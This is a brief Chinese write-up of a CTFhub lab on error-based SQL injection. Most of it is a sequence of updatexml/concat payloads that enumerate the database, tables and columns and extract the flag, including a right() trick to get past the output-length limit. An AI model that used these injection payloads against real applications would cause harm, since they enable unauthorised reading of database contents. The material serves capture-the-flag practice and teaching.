CTFhub-sqli注入-报错注入

用到的函数

updatexml(1, ,1)

concat(0x7e, ,0x7e)

group_concat(目标值)

right(,32)

1

1'

1 union select updatexml(1,concat(0x7e,database(),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='sqli'),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1)

1 union select updatexml(1,**concat(0x7e,right((select(group_concat(flag))from sqli.flag),32),0x7e),**1)

相关推荐
王道长服务器 | 亚马逊云2 分钟前
AWS + SeyouCMS:海外资源站的高性能部署实战
服务器·网络·数据库·云计算·软件构建·aws
泷羽Sec-静安8 分钟前
Less-7 GET-Dump into outfile-String
android·前端·网络·sql·安全·web安全
紫金桥软件1 小时前
组态软件和实时数据库区别大吗?
数据库·物联网·软件工程·scada·监控组态软件
TDengine (老段)2 小时前
益和热力性能优化实践:从 SQL Server 到 TDengine 时序数据库,写入快 20 秒、查询提速 5 倍
大数据·数据库·物联网·性能优化·时序数据库·tdengine·1024程序员节
yolo_Yang2 小时前
【MySQL】mysqldump使用方法
数据库·mysql·oracle
codeyanwu2 小时前
SQL 学习笔记
笔记·sql·学习
玩转测试开发2 小时前
xshell设置跳板机登录内网服务器
运维·服务器·数据库
你不是我我3 小时前
【Java 开发日记】运行时有出现过什么异常?
数据库·oracle
夏玉林的学习之路3 小时前
正则表达式
数据库·c++·qt·mysql·正则表达式
JIngJaneIL4 小时前
财务管理|基于SprinBoot+vue的个人财务管理系统(源码+数据库+文档)
java·前端·数据库·vue.js·spring boot·毕设·财务管理系统